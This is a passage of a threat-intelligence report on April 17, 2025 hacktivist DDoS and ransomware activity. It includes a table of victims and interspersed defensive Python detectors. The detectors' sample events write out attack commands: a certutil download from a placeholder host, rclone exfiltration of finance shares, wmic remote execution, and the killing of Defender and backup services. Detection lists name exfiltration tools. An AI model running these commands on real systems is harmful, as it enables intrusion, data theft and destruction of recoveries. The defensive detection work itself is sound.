- Hacktivist Alliances: The cyber landscape features collaborations between hacktivist groups. Examples include the CARRtel alliance involving PCA and NoName057(16) 21, the Holy League uniting pro-Russian and pro-Palestinian groups 18, and the partnership between SECT0R16 and OverFlame.23 These alliances can pool resources, share TTPs, and enable more complex or widespread campaigns.
- Impact and Evolution: While often perceived as less sophisticated than other attack types, DDoS campaigns by groups like NoName057(16) demonstrate significant disruptive potential, achieving reported success rates of around 40%.1 The trend appears to be shifting from simple website takedowns towards more strategic disruption of essential services, potentially blurring the lines with state-sponsored operations, especially when objectives align.2
Ransomware Modus Operandi
The ransomware incidents observed on April 17 showcase a mature, adaptable, and highly damaging criminal enterprise.
- RaaS Dominance: The Ransomware-as-a-Service model is prevalent, with groups like Qilin, DragonForce, MEDUSA, RALord, and Space Bears (via Phobos alignment) operating affiliate programs.5 This model allows core developers to focus on malware development and infrastructure, while affiliates specialize in gaining initial access and deploying the ransomware. High commission rates (e.g., 80-85% for DragonForce, RALord) incentivize affiliate participation.11
- Double/Triple Extortion: This is the standard operating procedure. Attackers first exfiltrate sensitive data before encrypting systems.5 The primary leverage then becomes the threat of publishing this stolen data on a public DLS hosted on Tor, rather than solely relying on the need for decryption. Some groups, like MEDUSA, may engage in triple extortion, demanding further payments after an initial ransom.10 Aggressive tactics are common, including short payment deadlines (SAFEPAY, Sarcoma) and publishing negotiation details (DragonForce).8
- Data Exfiltration Focus: The claims made by ransomware groups consistently highlight the theft of specific, high-value data types: Personally Identifiable Information (PII), financial records, customer databases, intellectual property, employee records (including passport IDs), student data (including academic and special needs information), legal documents, and health information. This demonstrates a deliberate focus on acquiring data that maximizes reputational damage, regulatory risk (e.g., GDPR, HIPAA), and operational impact for the victim, thereby increasing the pressure to pay the ransom.
- Initial Access Vectors: Common methods used by ransomware affiliates to breach networks include exploiting vulnerabilities in Remote Desktop Protocol (RDP) 7, conducting phishing campaigns to steal credentials 5, and exploiting known vulnerabilities (CVEs) in public-facing applications and VPN solutions.5 Many RaaS operations rely on Initial Access Brokers (IABs) who specialize in gaining and selling network access.10
- Evasion Techniques: Ransomware actors continuously refine their techniques to bypass security controls. This includes heavy reliance on Living-off-the-Land (LOTL) techniques, abusing legitimate system tools like PowerShell and WMI.10 Using legitimate remote administration tools (AnyDesk, ConnectWise, etc.) helps blend malicious activity with normal administrative tasks.10 Script obfuscation 10, fileless execution 6, UAC bypass techniques 7, and actively disabling security software and deleting logs 7 are common practices. The adoption of modern programming languages like Rust (used by Qilin, RALord) may also offer advantages in performance and evasion.24
- Infrastructure: The Tor network remains essential for ransomware operations, providing anonymity for hosting DLSs and facilitating communication and negotiation with victims.5
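As an added defensive illustration (not from the report), the Python below encodes several of the TTPs listed above as simple detections over constructed Sysmon-like process-creation events, then sums hits per host for triage; every path, keyword list and severity weight is an assumption of this example.

```python
"""Illustrative host-level detections for the ransomware TTPs listed above:
LOLBin/LOTL abuse (PowerShell, WMI, certutil), staging of legitimate remote-admin
tools, Rclone exfiltration, termination of security/backup/database services and
a known encryptor name. Added example, not from the report: the event shape is a
constructed Sysmon-like subset, and every path, keyword list and severity weight
below is an assumption of this example."""
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    event_id: int
    host: str
    image: str         # path of the executable that started
    cmdline: str
    parent_image: str  # path of the parent process


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
REMOTE_ADMIN_TOOLS = ("anydesk", "connectwise", "screenconnect", "splashtop")
TERMINATION_TOOLS = {"net.exe", "net1.exe", "sc.exe", "taskkill.exe"}
PROTECTED_KEYWORDS = ("sql", "veeam", "backup", "defend", "msmpeng", "antivirus")


def lolbin_defender_tamper(ev):
    # The settings LOLBin named above, driven with arguments from a shell or script host.
    return (basename(ev.image) == "systemsettingsadminflows.exe"
            and basename(ev.parent_image) in SHELLS and len(ev.cmdline.split()) > 1)


def powershell_recon_or_obfuscation(ev):
    tokens = ev.cmdline.lower().split()
    return (basename(ev.image) in {"powershell.exe", "pwsh.exe"}
            and (any("sharefinder" in t for t in tokens)
                 or any(t in {"-enc", "-encodedcommand", "-ec"} for t in tokens)))


def certutil_download_or_decode(ev):
    cl = ev.cmdline.lower()
    return basename(ev.image) == "certutil.exe" and ("-urlcache" in cl or "-decode" in cl)


def wmi_remote_exec(ev):
    return basename(ev.image) == "wmic.exe" and "process call create" in ev.cmdline.lower()


def rclone_exfil(ev):
    tokens = ev.cmdline.lower().split()
    return "rclone" in basename(ev.image) and any(t in {"copy", "sync", "move"} for t in tokens)


def remote_admin_tool_staged(ev):
    return any(tool in basename(ev.image) for tool in REMOTE_ADMIN_TOOLS)


def service_or_process_termination(ev):
    cl = ev.cmdline.lower()
    return (basename(ev.image) in TERMINATION_TOOLS
            and any(v in cl for v in (" stop ", "/im ", "/pid "))
            and any(k in cl for k in PROTECTED_KEYWORDS))


def known_encryptor_name(ev):
    return basename(ev.image) == "gaze.exe"  # encryptor name reported for MEDUSA above


# (rule name, severity weight, predicate); weights are arbitrary for this example.
RULES = [
    ("lolbin_defender_tamper", 8, lolbin_defender_tamper),
    ("powershell_recon_or_obfuscation", 5, powershell_recon_or_obfuscation),
    ("certutil_download_or_decode", 6, certutil_download_or_decode),
    ("wmi_remote_exec", 6, wmi_remote_exec),
    ("rclone_exfil", 9, rclone_exfil),
    ("remote_admin_tool_staged", 5, remote_admin_tool_staged),
    ("service_or_process_termination", 8, service_or_process_termination),
    ("known_encryptor_name", 10, known_encryptor_name),
]


def detect(events):
    """(rule name, event id, host, severity) for every rule that fires on an event."""
    return [(name, ev.event_id, ev.host, sev)
            for ev in events for name, sev, pred in RULES if pred(ev)]


def host_risk(hits):
    """Severity sum per host; several distinct hits on one host is the triage signal."""
    risk = {}
    for _, _, host, sev in hits:
        risk[host] = risk.get(host, 0) + sev
    return risk


# Constructed sample events (paths and arguments are illustrative placeholders).
CMD, PS, EXPLORER = (r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\explorer.exe")
SAMPLE_EVENTS = [
    ProcEvent(1, "ws01", PS, r"powershell.exe -ExecutionPolicy Bypass -File C:\Users\Public\ShareFinder.ps1", CMD),
    ProcEvent(2, "ws01", r"C:\Windows\ImmersiveControlPanel\SystemSettingsAdminFlows.exe", "SystemSettingsAdminFlows.exe [arguments omitted]", CMD),
    ProcEvent(3, "ws01", r"C:\Windows\System32\certutil.exe", "certutil.exe -urlcache -split -f http://placeholder.invalid/a.bin a.bin", CMD),
    ProcEvent(4, "fs01", r"C:\Users\Public\rclone\rclone.exe", r"rclone.exe copy C:\Shares\Finance remote:store", CMD),
    ProcEvent(5, "fs01", r"C:\Windows\System32\net.exe", 'net stop "Veeam Backup Service"', CMD),
    ProcEvent(6, "fs01", r"C:\Windows\System32\taskkill.exe", "taskkill /F /IM MsMpEng.exe", CMD),
    ProcEvent(7, "fs01", r"C:\Users\Public\gaze.exe", "gaze.exe", CMD),
    ProcEvent(8, "fs01", r"C:\Users\Public\AnyDesk.exe", "AnyDesk.exe", EXPLORER),
    ProcEvent(9, "fs01", r"C:\Windows\System32\wbem\wmic.exe", 'wmic /node:FS02 process call create "cmd.exe /c whoami"', PS),
    ProcEvent(10, "ws01", r"C:\Windows\System32\notepad.exe", r"notepad.exe C:\notes.txt", EXPLORER),
]
```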
The ransomware ecosystem functions as a highly professionalized illicit industry. Specialization (developers, affiliates/IABs, negotiators), continuous technical innovation focused on evasion, and the strategic shift towards data exfiltration as the primary extortion lever make it a formidable and adaptive threat.
Table 3: Ransomware Claims Summary (April 17, 2025)
Threat Actor | Victim Organization | Victim Country | Victim Industry | Claimed Data Volume | Claimed Data Types (Examples) | Publication Deadline (Days from report) |
--- | --- | --- | --- | --- | --- | --- |
Sarcoma | Kaye Lifestyle Homes | USA | Real Estate | 521GB | Employee Passport IDs, Budget Reports, Employment Slips | 6-7 |
Sarcoma | Tralfo | Italy | Transportation & Logistics | 34GB | ID cards, Transport confirmations | 6-7 |
Sarcoma | Manchester Credit Union Limited | UK | Banking & Mortgage | 6GB | IDs, Financial Reports, PII, Membership Applications | 7-8 |
Sarcoma | Schultz Industries, Inc. | USA | Facilities Services | 61GB | Claim/Payment info, Loss settlement | 6-7 |
Sarcoma | Ju Percussion Group Foundation | Taiwan | Arts & Crafts | 1.6TB | National IDs, Insurance reports, Labor compensation slips | 8-9 |
Qilin | Universal Window and Door LLC | USA | Manufacturing | 35GB | Customer details, Shipping addresses, Payroll, Quotes | Not specified |
Qilin | Yankee Trails | USA | Hospitality & Tourism | 96GB | Passport, Credit card auth forms | Not specified |
Qilin | Bertie County Public Schools | USA | Education | 50GB | Contracts, Student PII (Name, ID, GPA), Incident reports, IEPs | Not specified |
SAFEPAY | Stadt Heilbronn | Germany | Government Administration | 85GB | Not specified | 3-4 |
SAFEPAY | Kellermann & Engelhardt ITEC GmbH | Germany | Building & Construction | 70GB | Not specified | Not specified |
SAFEPAY | Heinrich + Steinhardt GmbH | Germany | Architecture & Planning | 49GB | Not specified | 3-4 |
SAFEPAY | Helix Tool | UK | Manufacturing | 239GB | Not specified | 3-4 |
SAFEPAY | Hurst + Schröder GmbH | Germany | Manufacturing | 239GB | Not specified | 3-4 |
Space Bears | Evertech Instrumental Co., Ltd. (ETI) | Taiwan | Electrical & Electronic Mfg. | Not specified | Databases, Financial docs, Employee/Client PII | 6-7 |
Space Bears | Viñuelas Abogados | Spain | Law Practice & Law Firms | Not specified | Client legal info, Financial docs, Employee/Client PII | 7-8 |
DragonForce | City of Grove | USA | Government Administration | 78.92GB | Not specified | 5-6 |
DragonForce | Iris ID Systems Inc | USA | Information Technology (IT) Services | 204.66GB | Not specified | 5-6 |
MEDUSA | Lithium Americas Corp. | Canada | Mining/Metals | Not specified | Not specified (Sample screenshots available) | 8-9 |
RALord | Bio-Clima Service Srl | Italy | Medical Equipment Manufacturing | 50GB | Not specified | 7-8 |
The Market for Illicit Access and Tools
The incidents involving ‘cryptoday’ and ‘Xirosina’ highlight the crucial role of the underground economy that supports and enables cyberattacks.
- Initial Access Brokers (IABs): Actors like ‘cryptoday’ specialize in gaining unauthorized access to networks or specific high-value accounts (like the WP WooCommerce admin access) and then selling that access to other criminals [10]. This creates a supply chain where ransomware groups or other attackers can purchase ready-made entry points, bypassing the often time-consuming reconnaissance and initial exploitation phases.
- Tooling: The availability of specialized software, such as the corporate access checker/brute-forcer advertised by ‘Xirosina’, democratizes attack capabilities. These tools automate common attack techniques like credential stuffing or brute-forcing against prevalent enterprise services (VPNs, webmail, remote access panels), allowing less skilled actors to conduct attacks or enabling sophisticated actors to scale their operations [33].
- Platforms: Underground forums, often accessible via the open web or Tor, serve as marketplaces where IABs and tool vendors connect with buyers. Forums like exploit[.]in are known hubs for this type of illicit commerce.
This readily accessible market for initial access and attack tools acts as a significant force multiplier for cybercrime. It lowers the barrier to entry for aspiring criminals and streamlines operations for established groups, contributing directly to the high volume and success rate of attacks like ransomware.
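The tooling described above leaves a recognizable footprint in authentication logs, which is where a defender can catch it. The detector below is an added example, not code from the report or from any tool it mentions: it distinguishes credential stuffing (one source cycling through many accounts) from brute forcing (one source hammering a single account) within a sliding time window, and raises the highest-priority signal when a success follows a burst of failures from the same source. The log format, the thresholds and the sample log lines are constructed assumptions.

```python
"""Detect credential-stuffing and brute-force patterns in authentication logs.

Added example; not code from the report or any vendor it cites. The log
format, thresholds and sample lines below are constructed for illustration.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed log format (assumption): "<ISO timestamp> <service> <FAIL|OK> user=<name> src=<ip>"
LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<service>\S+) (?P<result>FAIL|OK) user=(?P<user>\S+) src=(?P<src>\S+)$"
)

WINDOW = timedelta(minutes=5)
STUFFING_DISTINCT_USERS = 5   # distinct accounts failing from one source within WINDOW
BRUTE_FORCE_FAILS = 6         # failures against one account from one source within WINDOW

# Constructed sample: 203.0.113.5 tries many accounts once each and finally succeeds,
# 198.51.100.7 hammers 'admin', 192.0.2.10 is a user who mistyped once, and the last
# line is a lone failure far outside the window (it must not re-alert).
SAMPLE_LOG = """\
2025-04-17T08:00:01Z vpn FAIL user=alice src=203.0.113.5
2025-04-17T08:00:02Z vpn FAIL user=bob src=203.0.113.5
2025-04-17T08:00:03Z vpn FAIL user=carol src=203.0.113.5
2025-04-17T08:00:04Z vpn FAIL user=dave src=203.0.113.5
2025-04-17T08:00:05Z vpn FAIL user=erin src=203.0.113.5
2025-04-17T08:00:06Z vpn FAIL user=frank src=203.0.113.5
2025-04-17T08:00:07Z vpn OK user=frank src=203.0.113.5
2025-04-17T08:01:00Z owa FAIL user=admin src=198.51.100.7
2025-04-17T08:01:10Z owa FAIL user=admin src=198.51.100.7
2025-04-17T08:01:20Z owa FAIL user=admin src=198.51.100.7
2025-04-17T08:01:30Z owa FAIL user=admin src=198.51.100.7
2025-04-17T08:01:40Z owa FAIL user=admin src=198.51.100.7
2025-04-17T08:01:50Z owa FAIL user=admin src=198.51.100.7
2025-04-17T08:02:00Z vpn FAIL user=grace src=192.0.2.10
2025-04-17T08:02:30Z vpn OK user=grace src=192.0.2.10
2025-04-17T09:30:00Z vpn FAIL user=admin src=198.51.100.7
"""


def parse(log_text):
    """Parse log lines into dicts sorted by timestamp; malformed lines are skipped."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ev = m.groupdict()
        ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%SZ")
        events.append(ev)
    return sorted(events, key=lambda e: e["ts"])


def detect(events):
    """Return findings in the order they are triggered."""
    findings = []
    fails_by_src = defaultdict(deque)   # src -> deque of (ts, user) failures inside WINDOW
    flagged_stuffing = set()            # sources already reported for stuffing
    flagged_brute = set()               # (src, user) pairs already reported for brute force
    for e in events:
        q = fails_by_src[e["src"]]
        while q and e["ts"] - q[0][0] > WINDOW:   # expire failures outside the window
            q.popleft()
        if e["result"] == "FAIL":
            q.append((e["ts"], e["user"]))
            distinct = {u for _, u in q}
            if len(distinct) >= STUFFING_DISTINCT_USERS and e["src"] not in flagged_stuffing:
                flagged_stuffing.add(e["src"])
                findings.append({"type": "credential_stuffing", "src": e["src"],
                                 "service": e["service"], "distinct_users": len(distinct)})
            per_user = sum(1 for _, u in q if u == e["user"])
            key = (e["src"], e["user"])
            if per_user >= BRUTE_FORCE_FAILS and key not in flagged_brute:
                flagged_brute.add(key)
                findings.append({"type": "brute_force", "src": e["src"],
                                 "user": e["user"], "failures": per_user})
        else:
            # A success from a source already seen guessing is the signal to act on first:
            # the guessing may have worked, so the account needs immediate review.
            if e["src"] in flagged_stuffing or (e["src"], e["user"]) in flagged_brute:
                findings.append({"type": "success_after_failures", "src": e["src"],
                                 "user": e["user"], "service": e["service"]})
    return findings


def run(log_text=SAMPLE_LOG):
    return detect(parse(log_text))


if __name__ == "__main__":
    for f in run():
        print(f)
```

The per-source deque is what makes the window cheap: each failure is examined once when it arrives and once when it expires, so the detector runs in a single pass over a log stream. The lone `admin` failure at 09:30 produces nothing because the earlier burst has aged out, which is the behaviour you want from a windowed rule rather than a lifetime counter.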
6. Concluding Remarks and Strategic Outlook
Synthesis of Findings
The cyber threat landscape, as exemplified by the activity on April 17, 2025, remains volatile and multifaceted. Key observations include:
- Geopolitically Motivated DDoS: Hacktivist groups, notably NoName057(16), continue to leverage DDoS attacks as a primary tool for disruption and protest, closely aligning their campaigns with real-world conflicts like the Russia-Ukraine war.
- Diverse and Sophisticated Ransomware: The ransomware ecosystem is characterized by numerous active groups employing the RaaS model and standardized double extortion tactics. These groups demonstrate continuous evolution in their TTPs, focusing on stealth, evasion, and maximizing pressure through data theft.
- Critical Role of Underground Markets: The availability of initial access credentials and specialized attack tools on underground forums significantly enables and accelerates cybercrime operations, particularly ransomware.
- Platform Specialization: Threat actors utilize specific platforms based on their needs: Telegram for hacktivist communication and coordination, Tor for anonymous ransomware infrastructure, and dedicated forums for illicit trade.
Interconnectedness
These different facets of the threat landscape are often interconnected. IABs provide the crucial first step for many ransomware attacks. Hacktivist groups may form alliances or potentially operate with tacit or direct state support, blurring lines [2]. Tools developed for one purpose can be repurposed by various actors. Understanding these connections is vital for comprehending the full scope of the threat environment.
Broader Implications
Several broader implications arise from this analysis:
- Blurring Motivations: The traditional distinction between ideologically motivated hacktivists and financially motivated cybercriminals is becoming less clear. Groups like DragonForce evolved from hacktivism to RaaS [28], while others like Dark Storm Team appear to blend political messaging with financial schemes like cryptocurrency promotion [34]. This convergence makes actor attribution and predicting future actions more challenging, as motivations may be mixed or shift based on opportunity.
- Growing OT/ICS Risk: The targeting of Operational Technology and Industrial Control Systems, explicitly mentioned in the profile of SECT0R16 [19] and reflected in broader trends of attacks on critical infrastructure [3], signifies an increasing risk of cyberattacks causing physical disruption. Compromising systems that control physical processes (e.g., energy grids, water treatment [2], manufacturing lines, building automation) elevates the potential impact far beyond data loss or financial harm.
- Necessity for Adaptive Defense: The constant evolution of ransomware TTPs—including the heavy use of living-off-the-land (LOTL) techniques [13], adoption of newer programming languages like Rust [31], rapid exploitation of new CVEs [10], and sophisticated evasion tactics—renders static, signature-based defenses insufficient. Effective security requires a dynamic, adaptive strategy focused on behavioral analysis, anomaly detection, and proactive threat hunting to identify and counter threats that bypass traditional prevention measures.
Strategic Recommendations
Based on the observed threats and trends, organizations should prioritize the following strategic security measures:
- DDoS Mitigation:
- Implement comprehensive, multi-layered DDoS protection services capable of absorbing large-volume attacks and filtering malicious traffic. This is especially critical for government, financial services, and critical infrastructure sectors frequently targeted by hacktivists.
- Utilize Web Application Firewalls (WAFs) to protect against application-layer attacks.
- Consider rate limiting, geo-blocking for irrelevant regions, and CAPTCHA challenges for public-facing services [1].
- Maintain and regularly test DDoS-specific incident response plans.
- Ransomware Defense (Multi-Layered Approach):
- Prevention:
- Vulnerability Management: Implement aggressive and timely patching, prioritizing vulnerabilities known to be exploited by ransomware groups (e.g., those affecting VPNs, RDP, common enterprise software) [10].
- Secure Remote Access: Harden RDP configurations, enforce strong authentication (MFA), limit exposure, and monitor usage closely. Secure VPN implementations [7].
- Email Security: Deploy advanced email filtering solutions to detect and block phishing attempts, malicious attachments, and malicious links [5].
- User Training: Conduct regular security awareness training focusing on phishing identification, credential security, and safe browsing habits [24].
- Principle of Least Privilege: Restrict user and service account permissions to the minimum necessary.
- Detection:
- Endpoint Detection and Response (EDR/XDR): Deploy solutions with strong behavioral detection capabilities to identify LOTL techniques, suspicious script execution (PowerShell), process injection, credential dumping (Mimikatz), and unauthorized use of administrative tools (PsExec, remote access software) [10].
- Network Monitoring & Segmentation: Monitor internal network traffic for anomalous activity and lateral movement. Implement network segmentation to contain breaches and limit the spread of ransomware [24].
- Data Exfiltration Detection: Monitor for large or unusual outbound data transfers, potentially using tools like Rclone [10].
- Response & Recovery:
- Backups: Maintain robust backup strategies with immutable, offline (air-gapped), and regularly tested backups [24]. Ensure backup integrity and rapid recovery capabilities.
- Incident Response Plan: Develop and regularly exercise a comprehensive IR plan that specifically addresses ransomware and double extortion scenarios, including legal counsel engagement, data breach notification procedures, public relations strategy, and decision-making regarding ransom payment. Consider establishing a retainer with a professional IR firm.
- Initial Access Prevention:
- Perimeter Hardening: Secure all internet-facing systems and services.
- Multi-Factor Authentication (MFA): Enforce MFA across all accounts, especially privileged ones and remote access points.
- Credential Security: Implement strong password policies and monitor for credential leaks.
- Threat Intelligence: Monitor underground forums and marketplaces for mentions of company assets or compromised credentials being sold.
- OT/ICS Security:
- Organizations with OT environments must implement specific security controls, including robust IT/OT network segmentation, OT-specific monitoring and threat detection, vulnerability management tailored for ICS, secure remote access protocols, and physical security measures. Understand TTPs specific to OT environments [19].
- Continuous Threat Intelligence:
- Maintain awareness of the evolving threat landscape, including active threat actors, their TTPs, targeted vulnerabilities, and sectors/regions of focus. Utilize threat intelligence feeds, participate in information sharing groups (ISACs/ISAOs), and consume regular security reporting.
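The rate-limiting, geo-blocking and CAPTCHA-challenge items under DDoS Mitigation can be combined into a single per-request decision at the edge. The following is an added example, not code from the report or from any DDoS product: a token bucket per source address enforces a sustained rate while allowing short bursts, sources from regions the service never serves are dropped outright, and a source that keeps exceeding its allowance is escalated from plain rate limiting to a challenge and finally to a block. The country lookup is a constructed stub standing in for a GeoIP database, and every threshold, region code and traffic sample is a constructed assumption.

```python
"""Edge request filtering: per-source token-bucket rate limiting, geo-blocking,
and escalation from rate limiting to a CAPTCHA challenge to an outright block.

Added example, not code from the report. The country lookup is a constructed
stub standing in for a GeoIP database; thresholds and traffic are assumptions.
"""
from collections import Counter
from dataclasses import dataclass

RATE_PER_SEC = 5.0        # sustained requests per second allowed per source
BURST = 10                # bucket capacity: bursts up to this size pass unhindered
CHALLENGE_AFTER = 3       # rejections before the source is served a CAPTCHA instead
BLOCK_AFTER = 20          # rejections before the source is blocked outright
BLOCKED_REGIONS = {"XX"}  # assumption: region codes the service never serves

# Constructed stub: address prefix -> country code (a deployment would query a GeoIP DB).
GEO_STUB = {"203.0.113.": "XX", "198.51.100.": "DE", "192.0.2.": "US"}


def country_of(ip):
    """Return the country code for an address, or 'ZZ' when unknown."""
    for prefix, cc in GEO_STUB.items():
        if ip.startswith(prefix):
            return cc
    return "ZZ"


@dataclass
class Bucket:
    tokens: float
    last: float
    rejected: int = 0   # rejections since the source last solved a challenge


class EdgeFilter:
    def __init__(self):
        self.buckets = {}

    def decide(self, ip, now):
        """Classify one request as 'allow', 'rate_limit', 'challenge' or 'block'."""
        if country_of(ip) in BLOCKED_REGIONS:
            return "block"
        b = self.buckets.get(ip)
        if b is None:
            b = self.buckets[ip] = Bucket(tokens=BURST, last=now)
        if b.rejected >= BLOCK_AFTER:
            return "block"          # sticky until an operator or a solved challenge clears it
        # Refill in proportion to elapsed time, never beyond the burst capacity.
        b.tokens = min(BURST, b.tokens + (now - b.last) * RATE_PER_SEC)
        b.last = now
        if b.tokens >= 1.0:
            b.tokens -= 1.0
            return "allow"
        b.rejected += 1
        if b.rejected >= BLOCK_AFTER:
            return "block"
        if b.rejected >= CHALLENGE_AFTER:
            return "challenge"
        return "rate_limit"

    def challenge_passed(self, ip):
        """A solved CAPTCHA clears the escalation counter for that source."""
        if ip in self.buckets:
            self.buckets[ip].rejected = 0


def simulate(ip, requests, interval, start=0.0, edge=None):
    """Replay `requests` spaced `interval` seconds apart; return a count of decisions."""
    edge = edge if edge is not None else EdgeFilter()
    counts = Counter()
    for i in range(requests):
        counts[edge.decide(ip, start + i * interval)] += 1
    return counts


if __name__ == "__main__":
    print("flood    ", simulate("198.51.100.7", 100, 0.01))  # constructed: 100 req/s
    print("browsing ", simulate("192.0.2.10", 30, 1.0))      # constructed: 1 req/s
    print("geo-block", simulate("203.0.113.9", 5, 1.0))      # constructed: blocked region
```

The time source is passed in rather than read from the clock so that the filter is deterministic and testable; a deployment would pass the request's arrival time. The bucket state is per source address, which is exactly the part that does not scale to a large distributed flood, which is why the report recommends an upstream DDoS protection service capable of absorbing volumetric attacks in front of controls like this one.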
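The behavioral detections listed under Detection (suspicious PowerShell, administrative tools such as PsExec, credential dumping, and Rclone-style exfiltration correlated with large outbound transfers) can be expressed as a handful of rules over endpoint and network telemetry. The code below is an added example that is not the report's own or any EDR vendor's code. It decodes a `-EncodedCommand` payload so an analyst sees what would actually run, flags known remote-execution and sync tools, treats any process reading LSASS as credential access, sums outbound bytes per host and external peer, and escalates a large transfer to critical when the same host has also run an exfiltration tool. The event schema, the tool lists, the thresholds and the sample events are constructed assumptions.

```python
"""Behavioural rules for ransomware precursor activity over endpoint telemetry.

Added example; not from the report or any cited vendor. The event schema,
tool lists, thresholds and sample events below are constructed assumptions.
"""
import base64
import re
from collections import defaultdict

# PowerShell's -e / -ec / -enc / -EncodedCommand switch followed by a base64 blob.
ENCODED_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I)
# Flags that hide the window or disable profile/policy; weaker signal than an encoded blob.
HIDDEN_FLAGS_RE = re.compile(r"-w(?:indowstyle)?\s+hidden|-nop\b|bypass", re.I)
REMOTE_EXEC_TOOLS = {"psexec.exe", "psexesvc.exe", "paexec.exe"}
EXFIL_TOOLS = {"rclone.exe", "megasync.exe"}
OUTBOUND_THRESHOLD = 500 * 1024 * 1024   # bytes per (host, external peer) before alerting

# Constructed: the encoded payload is built here so the sample is obviously benign.
SAMPLE_ENC = base64.b64encode("Write-Output 'constructed sample'".encode("utf-16le")).decode()

SAMPLE_EVENTS = [
    {"type": "process", "host": "ws01", "image": "powershell.exe",
     "cmdline": f"powershell.exe -nop -w hidden -enc {SAMPLE_ENC}"},
    {"type": "process", "host": "srv02", "image": "psexec.exe",
     "cmdline": r"psexec.exe \\ws03 -s cmd.exe"},
    {"type": "process_access", "host": "srv02", "image": "rundll32.exe", "target": "lsass.exe"},
    {"type": "process", "host": "srv02", "image": "rclone.exe",
     "cmdline": r"rclone.exe copy D:\Finance remote:bucket"},
    {"type": "netflow", "host": "srv02", "dst": "198.51.100.44",
     "internal_dst": False, "bytes_out": 300 * 1024 * 1024},
    {"type": "netflow", "host": "srv02", "dst": "198.51.100.44",
     "internal_dst": False, "bytes_out": 300 * 1024 * 1024},
    # Benign noise: a signed inventory script and a big internal backup transfer.
    {"type": "process", "host": "ws05", "image": "powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\scripts\inventory.ps1"},
    {"type": "netflow", "host": "ws05", "dst": "10.0.0.5",
     "internal_dst": True, "bytes_out": 2 * 1024 * 1024 * 1024},
]


def decode_encoded_command(b64):
    """PowerShell encodes -EncodedCommand as base64 over UTF-16LE; return text or None."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse(events):
    """Evaluate the rules over a list of events and return findings in trigger order."""
    findings = []
    outbound = defaultdict(int)      # (host, dst) -> total bytes sent to external peers
    hosts_with_exfil_tool = set()
    for ev in events:
        if ev["type"] == "process":
            image = ev["image"].lower()
            cmd = ev.get("cmdline", "")
            m = ENCODED_RE.search(cmd)
            if image == "powershell.exe" and m:
                findings.append({"rule": "encoded_powershell", "host": ev["host"], "severity": "high",
                                 "decoded": decode_encoded_command(m.group(1))})
            elif image == "powershell.exe" and HIDDEN_FLAGS_RE.search(cmd):
                findings.append({"rule": "hidden_powershell_flags", "host": ev["host"],
                                 "severity": "medium", "cmdline": cmd})
            if image in REMOTE_EXEC_TOOLS:
                findings.append({"rule": "remote_execution_tool", "host": ev["host"],
                                 "severity": "medium", "image": image})
            if image in EXFIL_TOOLS:
                hosts_with_exfil_tool.add(ev["host"])
                findings.append({"rule": "exfil_tool_execution", "host": ev["host"],
                                 "severity": "high", "image": image})
        elif ev["type"] == "process_access" and ev["target"].lower() == "lsass.exe":
            findings.append({"rule": "lsass_access", "host": ev["host"],
                             "severity": "high", "image": ev["image"]})
        elif ev["type"] == "netflow" and not ev["internal_dst"]:
            outbound[(ev["host"], ev["dst"])] += ev["bytes_out"]
    # Volume rule runs after the pass so ordering of tool and flow events does not matter.
    for (host, dst), total in outbound.items():
        if total >= OUTBOUND_THRESHOLD:
            severity = "critical" if host in hosts_with_exfil_tool else "medium"
            findings.append({"rule": "large_outbound_transfer", "host": host,
                             "severity": severity, "dst": dst, "bytes": total})
    return findings


if __name__ == "__main__":
    for f in analyse(SAMPLE_EVENTS):
        print(f)
```

Two design points carry over to a real deployment: the outbound-volume rule aggregates over the whole batch before deciding, so it is insensitive to whether the tool launch or the flow records arrive first, and the correlation with an exfiltration tool is what turns a medium-severity transfer into something an on-call analyst must act on immediately, since the report notes that data theft is the pressure lever in double extortion.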
Forward Look
The convergence of geopolitical tensions and sophisticated cybercrime techniques suggests the current high level of threat activity will likely persist. Expect continued DDoS campaigns linked to global conflicts, potentially increasing in sophistication or targeting impact. Ransomware will remain a dominant threat, with actors further refining evasion techniques, potentially increasing focus on OT environments, and continuing to blur motivational lines by incorporating elements of hacktivism or other illicit activities. The underground markets for access and tools will continue to fuel these threats. Consequently, organizations must prioritize building cyber resilience through adaptive security strategies, robust incident response capabilities, and continuous vigilance informed by actionable threat intelligence.
Works cited
1. Unmasking NoName057(16) – CybelAngel, accessed April 17, 2025, https://cybelangel.com/unmasking-noname05716/
2. Hacktivism Offers Plausible Deniability for State-Backed Cyber Actors – Stratfor, accessed April 17, 2025, https://worldview.stratfor.com/article/hacktivism-offers-plausible-deniability-state-backed-cyber-actors
3. Ransomware, state actors, hacktivists exploited geopolitical tensions to target critical infrastructure in 2024 – Industrial Cyber, accessed April 17, 2025, https://industrialcyber.co/reports/ransomware-state-actors-hacktivists-exploited-geopolitical-tensions-to-target-critical-infrastructure-in-2024/
4. Weekly Top 10: 02.17.2025: DragonRank Seen Exploiting IIS …, accessed April 17, 2025, https://innovatecybersecurity.com/security-threat-advisory/weekly-top-10-02-17-2025-dragonrank-seen-exploiting-iis-servers-across-asia-postgresql-vulnerabilities-used-to-breach-beyondtrust-sarcoma-ransomware-operation-breached-unimicron-and-more/
5. Threat Actor Profile: Qilin Ransomware Group – Cyble, accessed April 17, 2025, https://cyble.com/threat-actor-profiles/qilin-ransomware-group/
6. Weekly Intelligence Report – 11 Apr 2025 – CYFIRMA, accessed April 17, 2025, https://www.cyfirma.com/news/weekly-intelligence-report-11-apr-2025/
7. What is SafePay Ransomware? – Everything You Need to Know …, accessed April 17, 2025, https://redpiranha.net/news/what-is-safepay-ransomware-everything-you-need-know
